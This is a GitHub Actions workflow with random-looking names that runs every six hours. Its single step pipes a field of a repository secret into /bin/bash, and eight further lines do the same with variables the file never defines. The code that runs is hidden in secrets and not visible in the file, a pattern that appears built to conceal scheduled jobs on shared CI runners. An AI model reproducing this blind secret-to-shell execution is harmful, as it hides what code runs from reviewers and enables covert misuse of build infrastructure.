name: duanyongchang8769
on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duanyongchang8769
        env:
          fcrg71: ${{ secrets.fcrg71 }}
        run: |
          echo $fcrg71 | jq -r .vqtq3 | /bin/bash
          echo $ebdl58894 | jq -r .xa54395 | /bin/bash
          echo $vg74 | jq -r .lecs244 | /bin/bash
          echo $snbo4550 | jq -r .w48494 | /bin/bash
          echo $sc668 | jq -r .tytg5 | /bin/bash
          echo $amxh93186 | jq -r .qyoy3548 | /bin/bash
          echo $vleam558 | jq -r .c0776 | /bin/bash
          echo $rkg5 | jq -r .tlyb9876 | /bin/bash
          echo $frxmt97881 | jq -r .fgfix30052 | /bin/bash

